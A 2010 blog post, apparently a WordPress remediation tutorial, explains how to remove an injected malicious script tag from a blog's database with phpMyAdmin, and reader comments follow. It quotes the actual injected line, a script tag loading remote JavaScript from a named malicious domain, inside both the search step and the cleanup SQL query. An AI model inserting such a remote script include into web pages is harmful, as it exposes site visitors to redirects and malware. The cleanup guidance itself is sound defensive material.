Neutralizing a Trojan.JS.Redirector.cq SQL injection on your WordPress blog

29 Jul

Early today, a friend Calvin Chew had tweeted me about an antivirus alert on my site. I immediately looked into it, and did some research on the internet.

It turned out that a code linked to a remote malicious Javascript had been inserted to each of my five-hundred-something pages and posts through an SQL injection attack which redirects visitors to a rogue antivirus page that downloads a rootkit onto the local system upon any click, even to close the window. This Javascript trojan is said to mostly affect MediaTemple-hosted WordPress blog.

I’ve managed to successfully cleared the databases in less than an hour on the phone. If your blog has been compromised, read on to find out how.

It would help if you knew as much details of the injection as possible. For example, Kaspersky Internet Security will report the threat name and URL. This can save time and speed up the remedial process.

Step 1:

Change your database user password. On MediaTemple, you can log into the (mt) AccountCenter, then navigate to your server controls and click on “Manage Databases”. Update your password under the “Global Settings” tab.

Step 2:

Log into PHPMyAdmin. The “Admin” buttons in “Databases List” will lead you there.

Step 3:

On the left-hand sidebar, click on the database of your blog which has been compromised.

Step 4:

It may be wise to back-up your database just in case anything happens.

Step 5:

Run a search for </script> in all tables of the database. This will return the rows that contain a Javascript code (including valid ones that you have added). Browse to a row that you do not remember having added a code, and identify the remote URL of the offending code. Copy the entire line of code which, in my case, is <script src="http://ao.euuaw.com/9"></script> (warning: don’t access the URL!).

Step 6:

Now return to the main page of your database and click on the “SQL” tab at the top. Enter the following query:

UPDATE wp_posts SET post_content = replace(post_content,'<script src="http://ao.euuaw.com/9"></script>','');

Here’s what it does: the first part says “access the ‘wp_posts’ table”, then the second says “look into the ‘post_content’ field”. By default, your database table should begin with “wp_”, however you can change this with the table prefix that you have chosen during installation. Then, the function does a search-and-replace in the ‘post_content’ fields of every row, searching for the Javascript code (change it to the code you copied earlier) and replacing it with a blank space (essentially deleting it).

Step 7:

Once that is done, your database table should be clear of the injection. Now update your blog’s wp-config.php file with the new database password. On an antimalware-protected system, check whether the malicious Javascript code still exists on your site.

The threat should be fully cleared from your WordPress blog by now. Just to be safe, you may check through your theme and plugin files for any traces of the threat.

8 Responses to “Neutralizing a Trojan.JS.Redirector.cq SQL injection on your WordPress blog”

  1. Melvin.F 29. Jul, 2010 at 9:35 pm #

    So just by deleting the URL thus eliminating the possibility of future injections? SQL injections do not need to even know your DB password.

    Reply
    • yauhui 29. Jul, 2010 at 10:04 pm #

      This tutorial shows how to remove an existing injection, not prevent a future injection. That I have not figured out how yet. The password change is just a precautionary measure.

      Reply
  2. Mark Olson 30. Jul, 2010 at 4:22 am #

    Thanks for posting the tutorial … much appreciated!

    Reply
  3. bRIAN 30. Jul, 2010 at 5:03 am #

    I had this too!!!
    I realized it at 6:30AM. I did the same steps before you were maybe even awake.

    That didn’t completely solve the issue. After the fix I was getting errors, 500 errors, database not found errors and other badness.

    What I did may have been drastic, i’m not sure.

    After I changed the password and removed the DB stuff I did the following…

    1) copy all plugins to a backup directory
    2) re-installed wordpress fresh via FTP
    3) restored from yesterdays database backup
    4) re-installed all plugins from the wordpress repository

    Wordpress 3

    The reason for all the fresh files is because, I’m speculating, that the malware inserted itself somewhere in javascript or php and was re-infecting or causing some other badness. my apache log was showing errors, cant remember exactly what, its the error you get when php is malformed.

    Reply
    • yauhui 30. Jul, 2010 at 1:28 pm #

      SQL injects usually do not affect the WordPress files. Your case seems more like a WordPress trojan. If you can, check through your WordPress users in PHPMyAdmin.

      Else, have a chat with your host to diagnose the issue.

      Reply
  4. Claudio 30. Jul, 2010 at 6:13 am #

    Now I can see that exact same line on every post I try to edit…

    Isn´t under any posts/pages yet, but it´s making me nervous to see this clearly lurking around

    Now I´ll try to figure out how to kick his a$$ before manage any post

    Reply
  5. Nathan Hangen - Digital Emperor 31. Jul, 2010 at 3:30 am #

    Thank you! Kept getting kicked out of phpMyadmin, but their support helped me out. Thank god.

    Reply

Pingbacks

  1. Tweets that mention the yauhuinator: Neutralizing a Trojan.JS.Redirector.cq SQL injection on your WordPress blog #tutorial #wordpress -- Topsy.com - 30. Jul, 2010

    [...] This post was mentioned on Twitter by yauhui, eightfalls and eightfalls, codesketch. codesketch said: @mediatemple just found that our site was hit with an SQL injection attack (same thing that they explain here http://bit.ly/dcJREA.) Help? [...]

Leave a Reply